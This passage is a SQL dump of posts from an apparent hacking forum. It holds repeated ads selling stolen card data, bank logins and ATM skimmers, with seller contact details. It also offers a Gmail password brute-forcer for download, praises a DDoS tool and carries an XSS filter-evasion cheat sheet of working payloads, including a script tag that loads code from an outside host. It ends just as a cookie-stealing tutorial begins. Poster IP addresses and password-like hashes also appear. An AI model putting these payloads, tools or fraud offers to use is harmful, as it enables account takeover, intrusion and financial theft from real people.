'0', '0'); INSERT INTO mybb_posts VALUES('196', '83', '0', '34', '[tut]How to make a thread design', '0', '9', 'p420', '1344288236', '[color=#87CEFA][size=medium]Details: [/size][/color]\nDifficulty: Intermediate with some advanced techniques \nTime: Varies-- Generally 30 minutes and up\n\n\n[img]http://i.minus.com/icXuXtpbOQh2w.png[/img]\n[img]http://i.minus.com/iLurZE0UDQJIh.png[/img]\n[img]http://i.minus.com/ipId0W0ZYCAcI.png[/img]\n[img]http://i.minus.com/iFv2tMjj24ePE.png[/img]\n[img]http://i.minus.com/iTLAcH6Vyv4VY.png[/img]', '41.174.54.150', '699283094', '0', '0', '9', '1344288275', '1', 'e43f88c4bd837acff84873e155da85b4', '0', '1344288275'); INSERT INTO mybb_posts VALUES('197', '83', '196', '34', 'RE: [tut]How to make a thread design', '0', '20', 'JakeUS', '1344288772', 'This is a very HQ tutorial.\n\nThanks for posting it!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '6234fbeb5af0418d8f03a6660f803810', '0', '0'); INSERT INTO mybb_posts VALUES('198', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '20', 'JakeUS', '1344300547', 'What is dota 2?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'a20903c99309c0147c8da1c7125b863c', '0', '0'); INSERT INTO mybb_posts VALUES('199', '84', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344312979', 'Track1&2 Fullz and Atm Skimmer.\r\n\r\nUSA BANKLOGIN\r\nCANADA LOGINS\r\nUK LOGINS\r\n\r\nUS CVV\r\nUK CVV\r\nEU CVV\r\nFULL CC with mmn,ssn,dob,pin = pm me for price\r\n\r\nUS Dumps:\r\nCanada Dumps:\r\nEurope Dumps:\r\nAsia Dumps\r\n\r\nAtm Skimmer Wincor Nixdorf = 3000\r\nAtm Skimmer Wincor = 3000\r\nAtm Skimmer Slimm = 3000\r\nAtm Skimmer Slim = 3000\r\nAtm Skimmer NCR = 3000\r\nAtm Skimmer Diebold Opteva = 2500\r\nAtm Skimmer Diebold = 2000\r\nAtm Skimmer Universal = 4000\r\nAtm Skimmer Small = 2500\r\nChip POS ingenico&amigo = 1500\r\n\r\nMSR206\r\nMSE ETC\r\n\r\nPRINTED TRACKS ON PLASTIC WITH PIN FOR SALE\r\n\r\nYIM : mr.ham69@yahoo.com\r\nICQ : 577044037\r\n\r\nemail me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '6411c7f386e20705eb6f685c260d7586', '0', '0'); INSERT INTO mybb_posts VALUES('200', '85', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313194', 'Track1&2 Fullz and Atm Skimmer.\r\n\r\nUSA BANKLOGIN\r\nCANADA LOGINS\r\nUK LOGINS\r\n\r\nUS CVV\r\nUK CVV\r\nEU CVV\r\nFULL CC with mmn,ssn,dob,pin = pm me for price\r\n\r\nUS Dumps:\r\nCanada Dumps:\r\nEurope Dumps:\r\nAsia Dumps\r\n\r\nAtm Skimmer Wincor Nixdorf = 3000\r\nAtm Skimmer Wincor = 3000\r\nAtm Skimmer Slimm = 3000\r\nAtm Skimmer Slim = 3000\r\nAtm Skimmer NCR = 3000\r\nAtm Skimmer Diebold Opteva = 2500\r\nAtm Skimmer Diebold = 2000\r\nAtm Skimmer Universal = 4000\r\nAtm Skimmer Small = 2500\r\nChip POS ingenico&amigo = 1500\r\n\r\nMSR206\r\nMSE ETC\r\n\r\nPRINTED TRACKS ON PLASTIC WITH PIN FOR SALE\r\n\r\nYIM : mr.ham69@yahoo.com\r\nICQ : 577044037\r\n\r\nemail me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '5c04786084baac6b6d8475515d2cfa7a', '0', '0'); INSERT INTO mybb_posts VALUES('201', '86', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313620', 'Track1&2 Fullz and Atm Skimmer.\r\n\r\nUSA BANKLOGIN\r\nCANADA LOGINS\r\nUK LOGINS\r\n\r\nUS CVV\r\nUK CVV\r\nEU CVV\r\nFULL CC with mmn,ssn,dob,pin = pm me for price\r\n\r\nUS Dumps:\r\nCanada Dumps:\r\nEurope Dumps:\r\nAsia Dumps\r\n\r\nAtm Skimmer Wincor Nixdorf = 3000\r\nAtm Skimmer Wincor = 3000\r\nAtm Skimmer Slimm = 3000\r\nAtm Skimmer Slim = 3000\r\nAtm Skimmer NCR = 3000\r\nAtm Skimmer Diebold Opteva = 2500\r\nAtm Skimmer Diebold = 2000\r\nAtm Skimmer Universal = 4000\r\nAtm Skimmer Small = 2500\r\nChip POS ingenico&amigo = 1500\r\n\r\nMSR206\r\nMSE ETC\r\n\r\nPRINTED TRACKS ON PLASTIC WITH PIN FOR SALE\r\n\r\nYIM : mr.ham69@yahoo.com\r\nICQ : 577044037\r\n\r\nemail me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '983ed48c6de9ffe2f2d4d4984ae7f2fe', '0', '0'); INSERT INTO mybb_posts VALUES('202', '87', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313725', 'Track1&2 Fullz and Atm Skimmer.\r\n\r\nUSA BANKLOGIN\r\nCANADA LOGINS\r\nUK LOGINS\r\n\r\nUS CVV\r\nUK CVV\r\nEU CVV\r\nFULL CC with mmn,ssn,dob,pin = pm me for price\r\n\r\nUS Dumps:\r\nCanada Dumps:\r\nEurope Dumps:\r\nAsia Dumps\r\n\r\nAtm Skimmer Wincor Nixdorf = 3000\r\nAtm Skimmer Wincor = 3000\r\nAtm Skimmer Slimm = 3000\r\nAtm Skimmer Slim = 3000\r\nAtm Skimmer NCR = 3000\r\nAtm Skimmer Diebold Opteva = 2500\r\nAtm Skimmer Diebold = 2000\r\nAtm Skimmer Universal = 4000\r\nAtm Skimmer Small = 2500\r\nChip POS ingenico&amigo = 1500\r\n\r\nMSR206\r\nMSE ETC\r\n\r\nPRINTED TRACKS ON PLASTIC WITH PIN FOR SALE\r\n\r\nYIM : mr.ham69@yahoo.com\r\nICQ : 577044037\r\n\r\nemail me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '40f83ab7f727bfe139b739e92652a327', '0', '0'); INSERT INTO mybb_posts VALUES('203', '88', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313895', 'Track1&2 Fullz and Atm Skimmer.\r\n\r\nUSA BANKLOGIN\r\nCANADA LOGINS\r\nUK LOGINS\r\n\r\nUS CVV\r\nUK CVV\r\nEU CVV\r\nFULL CC with mmn,ssn,dob,pin = pm me for price\r\n\r\nUS Dumps:\r\nCanada Dumps:\r\nEurope Dumps:\r\nAsia Dumps\r\n\r\nAtm Skimmer Wincor Nixdorf = 3000\r\nAtm Skimmer Wincor = 3000\r\nAtm Skimmer Slimm = 3000\r\nAtm Skimmer Slim = 3000\r\nAtm Skimmer NCR = 3000\r\nAtm Skimmer Diebold Opteva = 2500\r\nAtm Skimmer Diebold = 2000\r\nAtm Skimmer Universal = 4000\r\nAtm Skimmer Small = 2500\r\nChip POS ingenico&amigo = 1500\r\n\r\nMSR206\r\nMSE ETC\r\n\r\nPRINTED TRACKS ON PLASTIC WITH PIN FOR SALE\r\n\r\nYIM : mr.ham69@yahoo.com\r\nICQ : 577044037\r\n\r\nemail me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '6fc502e6a5619217c8aa564c005845e5', '0', '0'); INSERT INTO mybb_posts VALUES('204', '89', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313990', 'Track1&2 Fullz and Atm Skimmer.\r\n\r\nUSA BANKLOGIN\r\nCANADA LOGINS\r\nUK LOGINS\r\n\r\nUS CVV\r\nUK CVV\r\nEU CVV\r\nFULL CC with mmn,ssn,dob,pin = pm me for price\r\n\r\nUS Dumps:\r\nCanada Dumps:\r\nEurope Dumps:\r\nAsia Dumps\r\n\r\nAtm Skimmer Wincor Nixdorf = 3000\r\nAtm Skimmer Wincor = 3000\r\nAtm Skimmer Slimm = 3000\r\nAtm Skimmer Slim = 3000\r\nAtm Skimmer NCR = 3000\r\nAtm Skimmer Diebold Opteva = 2500\r\nAtm Skimmer Diebold = 2000\r\nAtm Skimmer Universal = 4000\r\nAtm Skimmer Small = 2500\r\nChip POS ingenico&amigo = 1500\r\n\r\nMSR206\r\nMSE ETC\r\n\r\nPRINTED TRACKS ON PLASTIC WITH PIN FOR SALE\r\n\r\nYIM : mr.ham69@yahoo.com\r\nICQ : 577044037\r\n\r\nemail me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '52a633a8b3070e4757f204f133498f07', '0', '0'); INSERT INTO mybb_posts VALUES('205', '84', '199', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356245', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('206', '85', '200', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356262', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('207', '86', '201', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356274', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('208', '87', '202', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356288', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('209', '88', '203', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356299', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('210', '89', '204', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356309', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('211', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '1', 't3h jok3r', '1344371531', 'I also had the same question.', '41.174.60.196', '699284676', '1', '0', '0', '0', '1', 'c38d0cde2b4f3b231a87cb0cde91cc77', '0', '0'); INSERT INTO mybb_posts VALUES('212', '57', '141', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '12', 'jonas83', '1344371862', 'No problem, I try being active and try to make L33t hacking full with great contributions.', '41.174.60.196', '699284676', '0', '0', '0', '0', '1', '25cfde2b9536fbf4e013b7df6052c8a6', '0', '0'); INSERT INTO mybb_posts VALUES('213', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '12', 'jonas83', '1344371941', 'Thanks and I didn\'t know that cnet allowed programs such as VPNs.', '41.174.60.196', '699284676', '0', '0', '0', '0', '1', 'fa1cc106e246006358ed2f8b8b4e74f8', '0', '0'); INSERT INTO mybb_posts VALUES('214', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '19', 'yazz', '1344372356', 'He posted it in the right section. This is the right places for programs.', '41.174.60.196', '699284676', '0', '0', '0', '0', '1', '666edd7df61066abea4808fcf07b1f04', '0', '0'); INSERT INTO mybb_posts VALUES('215', '90', '0', '24', '[tut]How to really hide your data from the cops', '0', '1', 't3h jok3r', '1344372996', 'The video title and description make it sound like the tutorial is just about truecrypt, but its more than that. This video will show you how to hide your information from the police and never get caught. \r\n\r\nhttp://www.securitytube.net/Encrypting-y...video.aspx\r\n\r\nAny feedback would be great! Enjoy.', '41.174.60.196', '699284676', '1', '0', '0', '0', '1', '91a73189aa68451e753122a0b9c26d98', '0', '0'); INSERT INTO mybb_posts VALUES('216', '90', '215', '24', 'RE: [tut]How to really hide your data from the cops', '0', '2', 'Apathy', '1344398722', 'Nice share thanks joker.', '65.93.79.28', '1096634140', '0', '0', '0', '0', '1', '821f40800af4b4020f7dc3477ead98da', '0', '0'); INSERT INTO mybb_posts VALUES('217', '83', '196', '34', 'RE: [tut]How to make a thread design', '0', '2', 'Apathy', '1344398799', 'Fresh tutorial/share thanks.', '65.93.79.28', '1096634140', '0', '0', '0', '0', '1', 'e7b02713d1bb66940bd79b1057f4b238', '0', '0'); INSERT INTO mybb_posts VALUES('218', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '2', 'Apathy', '1344399019', 'Lololol this was a interesting read.', '65.93.79.28', '1096634140', '0', '0', '0', '0', '1', '2babf5cf36803b6aa0bca2ca7aced1e6', '0', '0'); INSERT INTO mybb_posts VALUES('219', '91', '0', '42', 'Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '1', 't3h jok3r', '1344452361', '[img]http://l2.yimg.com/bt/api/res/1.2/FH_9AMRtgCOqV.sSBuOgdg--/YXBwaWQ9eW5ld3M7cT04NTt3PTYzMA--/http://media.zenfs.com/en/blogs/sptusolyexperts/asfaaaaa.jpg[/img]\r\n\r\nSouth African gold medalist Cameron van der Burgh admitted to taking extra underwater kicks during his world-record performance in the 100-meter breaststroke at the Olympics, an illegal move that would have earned him a disqualification if judges had caught him.\r\nSwimmers are allowed one underwater [b]dolphin kick during their underwater[/b] breaststroke pullouts. Replays show van der Burgh took three on the start.', '41.174.9.29', '699271453', '1', '0', '0', '0', '1', 'db3ec1b63818e36fbfd51a88885514a5', '0', '0'); INSERT INTO mybb_posts VALUES('220', '92', '0', '15', '[FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '9', 'p420', '1344454979', '[img]http://dl.dropbox.com/u/9005148/RhinoTube/logo.png[/img]\n\n[color=#00BFFF][b]Screenshot(s):[/b][/color]\n\n[img]http://dl.dropbox.com/u/9005148/RhinoTube/2.png[/img]\n\n[img]http://dl.dropbox.com/u/9005148/RhinoTube/3.png[/img]\n\n[img]http://dl.dropbox.com/u/9005148/RhinoTube/4.png[/img]\n\n[img]http://dl.dropbox.com/u/9005148/RhinoTube/5.png[/img]\n\n[color=#00BFFF][b]Features:[/b][/color]\n\n-Free Online Account List (250+ accounts)\n-Rate (Like / Dislike)\n-Comment \n-Account Checker\n-Use Proxy List \n(Hasn\'t really been tested because I don\'t have a working proxy list, but if someone could give me a working one to test with I\'d appreciate it! I do not suggest using this function)\n\n[color=#00BFFF][b]Known Bugs:[/b][/color]\n\n-If the account doesn\'t have a valid email, the bot will stop (will be fixed when subscribe is added.\n\n[color=#00BFFF][b]Virus Scan:[/b][/color]\n\nhttp://www.virustotal.com/file-scan/report.html?id=90b0a0cdcdd9bde458b9d9d22846df56ae4e365587e3598f918203cf602e7206-1284745112\n\n[color=#00BFFF][b]Download:[/b][/color]\n\n[lock]http://hotfile.com/dl/126293841/4c82cac/RhinoTubePremiumBeta_ubers.org.zip.html[/lock]\n\nPassword for archive:\n\n[code]www.ubers.org[/code]\n\nCredits: ubers.org', '41.174.9.29', '699271453', '0', '0', '1', '1352012003', '1', '8b6175463e2fc19f907d1d96b14348a4', '0', '1352012003'); INSERT INTO mybb_posts VALUES('221', '93', '0', '18', 'Gmail Brute Forcer Tool', '0', '9', 'p420', '1344455840', '[color=#FF0000][size=large]Hello L33T Hacking.Today i\'ll give you an password bruteforce tool,it\'s for Gmail.[/size][/color]\r\n\r\n[color=#A9A9A9][size=medium]Some info about the tool:[/size][/color]\r\n\r\n-Tool is a bit slow but it does the job successfully,off course if password is in the list.\r\n\r\n-Don\'t delete or rename dis.txt file because it\'s default file for password list.If did program won\'t work.\r\n\r\n-I found an big password list,it\'s included in download.\r\n\r\n-If you want to add more passwords in dis.txt it must be in the following format:\r\npassword|password|password etc.\r\n\r\n[color=#FFD700][size=medium]Download:[/size][/color]\r\n[url=http://adf.ly/BTT8z][color=#0000CD]HERE[/color][/url]\r\n\r\n[color=#FFD700][size=medium]Virus Scan:[/size][/color]\r\n.rar file [url=http://vscan.novirusthanks.org/file/07fa5d36f52f40f9d5ae35311d83ca02/Z21haWwtYnJ1dGUtcmFy/][color=#0000CD]HERE[/color][/url]\r\n.exe file [url=http://vscan.novirusthanks.org/file/0aac1805076d4441f0ff6522738f5293/Z21haWxoYWNrZXItZXhl/][color=#0000CD]HERE[/color][/url]\r\n\r\n[color=#FFD700][size=medium]Proof:[/size][/color]\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=g6S7riznKP4[/video]\r\n\r\nEnjoy', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '6ca1c710f2b02a09ab1235bdbcb9ca0c', '0', '0'); INSERT INTO mybb_posts VALUES('222', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '9', 'p420', '1344456003', 'Works like a charm, thanks for this voice changer.', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '5ed92d5d2f56845332b6f5d415f96b76', '0', '0'); INSERT INTO mybb_posts VALUES('223', '94', '0', '16', 'What is this section about?', '0', '9', 'p420', '1344456185', '[align=center][size=xx-large][font=Tahoma][u][b][color=#32CD32]What Is The Social Engineering Section?[/color][/b][/u][/font][/size][/align]\r\n\r\nWell my friends, let me enlighten you. The art of [b]Social Engineering[/b] can be getting free items out of businesses or successfully lying to someone and everything in between.\r\n\r\n[b]Social Engineering[/b] is commonly understood to mean the art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims.\r\n\"[b]Social Engineering[/b]\" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.\r\n\r\n[b]Social Engineering[/b] in political science refers to efforts that influence popular attitudes and social behaviors on a large scale, whether by governments or private groups. In the political arena, the counterpart of [b]Social Engineering[/b] is political engineering.\r\nFor various reasons, the term has been imbued with negative connotations. However, virtually all law and governance has the effect of seeking to change behavior and could be considered \"[b]Social Engineering[/b]\" to some extent. Prohibitions on murder, rape, suicide and littering are all policies aimed at discouraging undesirable behaviors. In British and Canadian jurisprudence, changing public attitudes about a behaviour is accepted as one of the key functions of laws prohibiting it. Governments also influence behavior more subtly through incentives and disincentives built into economic policy and tax policy, for instance, and have done so for centuries.\r\n\r\n\r\nIn practice, some (perhaps mainly on the left) would argue, whether any specific policy is labeled as \"[b]Social Engineering[/b]\" could be considered a question of intent; others (perhaps mainly on the right) would also argue it to be a question of scale and pace. The term is most often used by, on the one hand libertarians and free-market thinkers, and, on the other, social and cultural traditionalists as a criticism of those who propose to use law, tax policy, or other kinds of state influence to attempt to modify or altogether transform existing social mores or power relationships (actual or perceived): for instance, between men and women, or between different ethnic groups. \r\n\r\nPolitical conservatives in the United States have accused their opponents of [b]Social Engineering[/b] through the promotion of political correctness, insofar as it may change social attitudes by defining \"acceptable\" and \"unacceptable\" language or acts, and through such programs as the banning of prayers at public events. Political liberals in the United States have accused their opponents of [b]Social Engineering[/b] through the promotion of abstinence-only sex education, the English-only movement, sodomy laws and state sponsored school prayer.\r\n\r\nSocial engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.\r\n\r\nA social engineer runs what used to be called a \"con game.\" For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network\'s security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.\r\n\r\nSocial engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, and scareware vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst.\r\n\r\nAnother aspect of social engineering relies on people\'s inability to keep up with a culture that relies heavily on information technology. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. Frequently, social engineers will search dumpzters for valuable information, memorize access codes by looking over someone\'s shoulder (shoulder surfing), or take advantage of people\'s natural inclination to choose passwords that are meaningful to them but can be easily guessed.\r\n\r\nSecurity experts propose that as our culture becomes more dependent on information, social engineering will remain the greatest threat to any security system. Prevention includes educating people about the value of information, training them to protect it, and increasing people\'s awareness of how social engineers operate.', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '3ee24e310477daffb6ef26889059a4e1', '0', '0'); INSERT INTO mybb_posts VALUES('224', '82', '193', '13', 'RE: [guide]How to detect Hash Type', '0', '7', 'Romdu62', '1344456396', 'Sound come in handy. Nice decrypting sites.', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', 'b9c7b3f14831c3f7268d3560c15b245c', '0', '0'); INSERT INTO mybb_posts VALUES('225', '95', '0', '13', 'XSS Cheat Sheet', '0', '7', 'Romdu62', '1344456827', 'XSS locator. Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word \"XSS\" will pop up. Use the URL encoding calculator below to encode the entire string. Tip: if you\'re in a rush and need to quickly check a page, often times injecting the depreciated \"\" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:\r\n\r\n[code]\';alert(String.fromCharCode(88,83,83))//\\[/code]\r\n\r\nXSS locator 2. If you don\'t have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS verses &lt;XSS to see if it is vulnerable:\r\n[code]\'\';!--\"<XSS>=&{()}[/code]\r\n\r\nNo filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):\r\n\r\n[code]<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>[/code]\r\n\r\nImage XSS using the JavaScript directive (IE7.0 doesn\'t support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well - I\'ll probably revise this at a later date):\r\n\r\n[code]<IMG SRC=\"javascript:alert(\'XSS\');\">[/code]\r\n\r\nNo quotes and no semicolon:\r\n\r\n[code]<IMG SRC=javascript:alert(\'XSS\')>[/code]\r\n\r\nCase insensitive XSS attack vector:\r\n[code]<IMG SRC=JaVaScRiPt:alert(\'XSS\')>[/code]\r\n\r\nHTML entities (the semicolons are required for this to work):\r\n[code]<IMG SRC=javascript:alert(&quot;XSS&quot;)>[/code]\r\n\r\nGrave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don\'t know about grave accents):\r\n[code]<IMG SRC=`javascript:alert(\"RSnake says, \'XSS\'\")`>[/code]\r\n\r\nMalformed IMG tags. Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:\r\n[code]<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">[/code]\r\n\r\n\r\nfromCharCode (if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need). Click here to build your own (thanks to Hannes Leopold):\r\n[code]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>[/code]\r\n\r\nUTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS calculator for more information:\r\n[code]<IMG SRC=javascript:alert(\'XSS\')>[/code]\r\n\r\nLong UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for \"&#XX;\", since most people don\'t know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\\&#(\\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I\'ve seen this in the wild):\r\n[code]<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>[/code]\r\n\r\nHex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string =~ s/.*\\&#(\\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). Use the XSS calculator for more information:\r\n[code]<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>[/code]\r\n\r\nEmbedded tab to break up the cross site scripting attack: \r\n[code]<IMG SRC=\"jav ascript:alert(\'XSS\');\">[/code]\r\n\r\nEmbedded encoded tab to break up XSS:\r\n[code]<IMG SRC=\"jav&#x09;ascript:alert(\'XSS\');\">[/code]\r\n\r\nEmbeded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:\r\n[code]<IMG SRC=\"jav&#x0A;ascript:alert(\'XSS\');\">[/code]\r\n\r\nEmbedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I\'ve seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):\r\n[code]<IMG SRC=\"jav&#x0D;ascript:alert(\'XSS\');\">[/code]\r\n\r\nMultiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector) these are not spaces just one of the three characters as described above:\r\n[code]<IMG\r\nSRC\r\n=\r\n\"\r\nj\r\na\r\nv\r\na\r\ns\r\nc\r\nr\r\ni\r\np\r\nt\r\n:\r\na\r\nl\r\ne\r\nr\r\nt\r\n(\r\n\'\r\nX\r\nS\r\nS\r\n\'\r\n)\r\n\"\r\n>\r\n[/code]\r\n\r\nNull breaks up JavaScript directive. Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:\r\n[code]perl -e \'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";\' > out[/code]\r\n\r\nNull breaks up cross site scripting vector. Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I\'ve seen this vector bypass some of the most restrictive XSS filters to date:\r\n[code]perl -e \'print \"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\";\' > out[/code]', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '99939f5332b1524942a04876535c5395', '0', '0'); INSERT INTO mybb_posts VALUES('226', '94', '223', '16', 'RE: What is this section about?', '0', '1', 't3h jok3r', '1344457141', 'Nice thread, thanks for this explanation.', '41.174.9.29', '699271453', '1', '0', '0', '0', '1', '968b71494ae13492432e0f6d0988504d', '0', '0'); INSERT INTO mybb_posts VALUES('227', '93', '221', '18', 'RE: Gmail Brute Forcer Tool', '0', '2', 'Apathy', '1344479273', 'Nice share I will probably download it later.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '82fc55a1ed262f2a3d517179b763a85a', '0', '0'); INSERT INTO mybb_posts VALUES('228', '92', '220', '15', 'RE: [FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '2', 'Apathy', '1344479357', 'Thanks for the share. I will most likely download this later.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '274bddc0c56eda352310f84c0e987e7b', '0', '0'); INSERT INTO mybb_posts VALUES('229', '96', '0', '30', 'FBI Tools [11 in 1]', '0', '1', 't3h jok3r', '1344546455', 'This is a package of 11 useful tools used to investigate the computer, it is used by most of the investigating agency including the FBI to inspect, hack and analyze other computers.\r\n\r\nFor most of the programs, there is no need to install them, they are portable…\r\n\r\n[img]http://1.bp.blogspot.com/_BUvlLAqmDbQ/TCJVvbbXB9I/AAAAAAAAADY/ilCJUlhyU50/DINV.jpg[/img]\r\n\r\nThis download includes:\r\n\r\n- ADS Locator (Alternate Data Streams)\r\n- Disc Investigator 1.4 (File-Slack-Analyze)\r\n- Historian 1.4 (Browser Analyze)\r\n- Live View 0.6 (System Analyze)\r\n- MUI Cacheview 1.00 (Registry Analyze)\r\n- Networkminer 0.85 (Network Analyze)\r\n- Regripper 2.02 (Registry Analyze)\r\n- Systemreport 2.54 (PC Analyze)\r\n- USB-History R1 (USB-Stick-Analyze)\r\n- Windows File Analyzer (File Analyze)\r\n- Winpcap 4.02 (Network) \r\n\r\nDownload:\r\n[quote]\r\nhttp://uploading.com/files/9489eea3\r\n[/quote]', '41.174.60.186', '699284666', '1', '0', '0', '0', '1', 'ef374f3413d63113e2f60f47fa99ff60', '0', '0'); INSERT INTO mybb_posts VALUES('230', '81', '191', '12', 'RE: [tut]How to spread your server', '0', '1', 't3h jok3r', '1344546619', 'Seems cool, but I\'m too busy these days with this website.', '41.174.60.186', '699284666', '1', '0', '0', '0', '1', '0dfb05477a5b4f7beb023845c213e3aa', '0', '0'); INSERT INTO mybb_posts VALUES('231', '97', '0', '12', 'How to XSS and steal Cookies', '0', '1', 't3h jok3r', '1344546730', '## Title: What is the Cross Site Scripting attack and how to use the cookie grabbing 